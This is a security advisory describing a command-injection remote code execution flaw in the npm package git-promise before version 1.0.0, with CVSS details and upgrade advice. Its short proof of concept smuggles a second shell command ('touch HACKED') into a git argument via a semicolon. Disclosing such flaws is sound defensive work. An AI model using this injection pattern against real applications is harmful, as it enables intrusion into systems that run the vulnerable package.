Remote Code Execution (RCE)

Affecting git-promise package, versions <1.0.0

Report new vulnerabilities
Do your applications use this vulnerable package? Test your applications

Overview

git-promise is a Simple wrapper that allows you to run any git command using a more intuitive syntax.

Affected versions of this package are vulnerable to Remote Code Execution (RCE). The issue occurs because a user input is formatted inside a command that will be executed without any check.

PoC

var git = require("git-promise");
 
git("init;touch HACKED").then(function (branch) {
  console.log(branch); 
});

Remediation

Upgrade git-promise to version 1.0.0 or higher.

References

CVSS Score

6.2
medium severity
  • Attack Vector
    Physical
  • Attack Complexity
    Low
  • Privileges Required
    High
  • User Interaction
    None
  • Scope
    Unchanged
  • Confidentiality
    High
  • Integrity
    High
  • Availability
    High
CVSS:3.1/AV:P/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H/E:P/RL:O/RC:C
Credit
Michele Romano (mik317)
CWE
CWE-94
Snyk ID
SNYK-JS-GITPROMISE-567476
Disclosed
25 Apr, 2020
Published
26 Apr, 2020